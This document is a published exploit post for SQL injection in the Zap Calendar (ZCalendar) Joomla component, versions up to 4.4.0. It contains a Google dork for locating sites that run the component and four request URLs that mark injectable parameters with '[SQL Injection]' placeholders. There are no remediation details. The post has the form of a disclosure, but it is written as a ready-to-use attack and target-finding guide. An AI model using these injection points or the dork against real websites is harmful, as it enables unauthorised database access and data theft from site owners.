#################################################################### # Exploit Title : Joomla ZCalendar Zap Calendar 4.4.0 SQL Injection # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 12/02/2019 # Vendor Homepage : zcontent.net - zapcalendar.com # Software Download Link : zcontent.net/products/subscriptions # Software Information Link : extensions.joomla.org/extension/zap-calendar/ zcontent.net/support/zapcalendar/ # Software Version : 3 and 4 - 4.4.0 and previous versions. + Zap Calendar 4 is compatible only with Joomla version 3.x. + Zap Calendar 3 is compatible with Joomla versions 1.5, 1.6, 1.7 and 2.5. # Software Price : 49$ - 99$ - 139$ # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : inurl:''/index.php?option=com_zcalendar'' # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos #################################################################### # Description about Software : *************************** Zap Calendar is an advanced, native Joomla calendar featuring AJAX, RSS and full iCalendar support. There are dozens of add-ons available for Zap Calendar, making it a full-featured calendaring system for Joomla websites. #################################################################### # Impact : *********** * Joomla ZCalendar Zap Calendar 4.4.0 and other versions - component for Joomla is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. A remote attacker can send a specially crafted request to the vulnerable application and execute arbitrary SQL commands in application`s database. Further exploitation of this vulnerability may result in unauthorized data manipulation. An attacker can exploit this issue using a browser. #################################################################### # SQL Injection Exploit : ********************** /index.php?option=com_zcalendar&task=view&vmode=e&eid=[SQL Injection] /index.php?view=calendar&viewid=[ID-NUMBER]&format=html&Itemid=[ID-NUMBER]&option=com_zcalendar&ajax=[SQL Injection]&tmpl=zcalendar&vmode=m /index.php?option=com_zcalendar&Itemid=&ajax=[ID-NUMBER]&ctype=d&date=[YEAR]-[MONTH]-[DAY]&format=raw&id=[ID-NUMBER]&lang=en&limitstart=[SQL Injection]&view=calendar /index.php?cat=[ID-NUMBER]&cat=[ID-NUMBER]&cat=[ID-NUMBER]&cat=[ID-NUMBER]&cat=[ID-NUMBER]&cat=[ID-NUMBER]&cat=[ID-NUMBER]&cat=[ID-NUMBER]&cat=[ID-NUMBER]&allcatmatch=[ID-NUMBER]&vmode=w&viewid=[ID-NUMBER]&view=calendar&date=[YEAR]-[MONTH]-[DAY]&format=html&Itemid=ID-NUMBER]&option=com_zcalendar&viewid=[SQL Injection] #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################